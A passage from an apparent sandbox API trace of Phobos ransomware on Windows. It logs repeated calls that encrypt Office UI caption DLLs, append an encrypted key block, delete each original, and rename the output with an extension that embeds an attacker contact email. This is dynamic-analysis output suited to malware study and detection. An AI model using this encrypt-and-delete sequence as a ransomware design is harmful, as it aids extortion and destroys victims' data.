hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x25b70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x25b70, lpOverlapped=0x0) returned 1 [0167.234] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c68) returned 1 [0167.234] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0167.234] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0167.234] CryptDestroyKey (hKey=0xa32c68) returned 1 [0167.234] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0167.234] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0167.234] CloseHandle (hObject=0x148) returned 1 [0167.234] CloseHandle (hObject=0x17c) returned 1 [0167.234] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll")) returned 1 [0167.323] SetEvent (hEvent=0xe8) returned 1 [0167.323] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0167.323] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0167.323] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1137504) returned 1 [0167.323] CloseHandle (hObject=0x17c) returned 1 [0167.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll")) returned 0x2020 [0167.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.324] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0167.324] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0167.324] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0167.324] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0167.324] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0167.324] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0167.324] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x110100, lpOverlapped=0x0) returned 1 [0167.591] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110100, dwBufLen=0x110100 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110100) returned 1 [0167.600] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x110100, lpOverlapped=0x0) returned 1 [0167.670] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5a60, lpOverlapped=0x0) returned 1 [0167.719] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5a70, dwBufLen=0x5a70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5a70) returned 1 [0167.719] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5a70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5a70, lpOverlapped=0x0) returned 1 [0167.719] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0167.719] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0167.719] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0167.719] CryptDestroyKey (hKey=0xa32d28) returned 1 [0167.719] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0167.720] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0167.720] CloseHandle (hObject=0x17c) returned 1 [0167.720] CloseHandle (hObject=0x148) returned 1 [0167.786] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll")) returned 1 [0167.788] SetEvent (hEvent=0xe8) returned 1 [0167.788] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0167.788] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0167.788] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=15712) returned 1 [0167.788] CloseHandle (hObject=0x148) returned 1 [0167.788] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll")) returned 0x2020 [0167.788] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.788] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0167.789] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0167.789] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0167.789] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0167.789] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0167.789] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0167.789] ReadFile (in: hFile=0x148, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3d60, lpOverlapped=0x0) returned 1 [0167.864] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3d70, dwBufLen=0x3d70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3d70) returned 1 [0167.864] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3d70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3d70, lpOverlapped=0x0) returned 1 [0167.865] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0167.865] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0167.865] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0167.865] CryptDestroyKey (hKey=0xa32d28) returned 1 [0167.865] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0167.865] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0167.865] CloseHandle (hObject=0x148) returned 1 [0167.866] CloseHandle (hObject=0x17c) returned 1 [0167.866] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll")) returned 1 [0167.867] SetEvent (hEvent=0xe8) returned 1 [0167.867] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0167.867] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0167.868] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=14176) returned 1 [0167.868] CloseHandle (hObject=0x17c) returned 1 [0167.868] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll")) returned 0x2020 [0167.868] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.868] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0167.869] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0167.869] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0167.869] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0167.869] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0167.869] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0167.869] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3760, lpOverlapped=0x0) returned 1 [0168.021] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3770, dwBufLen=0x3770 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3770) returned 1 [0168.021] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3770, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3770, lpOverlapped=0x0) returned 1 [0168.022] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0168.022] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0168.022] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0168.022] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.022] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0168.023] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0168.023] CloseHandle (hObject=0x17c) returned 1 [0168.023] CloseHandle (hObject=0x148) returned 1 [0168.023] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll")) returned 1 [0168.024] SetEvent (hEvent=0xe8) returned 1 [0168.024] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0168.024] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0168.025] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=47456) returned 1 [0168.025] CloseHandle (hObject=0x148) returned 1 [0168.025] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll")) returned 0x2020 [0168.025] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.025] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0168.025] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0168.025] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0168.025] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0168.025] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0168.025] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0168.025] ReadFile (in: hFile=0x148, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xb960, lpOverlapped=0x0) returned 1 [0168.177] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb970, dwBufLen=0xb970 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb970) returned 1 [0168.177] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xb970, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xb970, lpOverlapped=0x0) returned 1 [0168.178] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0168.178] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0168.178] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0168.178] CryptDestroyKey (hKey=0xa327e8) returned 1 [0168.178] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0168.178] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0168.178] CloseHandle (hObject=0x148) returned 1 [0168.178] CloseHandle (hObject=0x17c) returned 1 [0168.179] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll")) returned 1 [0168.180] SetEvent (hEvent=0xe8) returned 1 [0168.180] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0168.180] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0168.180] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=294240) returned 1 [0168.181] CloseHandle (hObject=0x17c) returned 1 [0168.181] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll")) returned 0x2020 [0168.181] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.181] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0168.181] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0168.181] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0168.181] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0168.181] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0168.181] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0168.181] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x47d60, lpOverlapped=0x0) returned 1 [0168.386] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x47d70, dwBufLen=0x47d70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x47d70) returned 1 [0168.388] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x47d70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x47d70, lpOverlapped=0x0) returned 1 [0168.396] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c68) returned 1 [0168.396] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0168.396] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0168.396] CryptDestroyKey (hKey=0xa32c68) returned 1 [0168.396] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, 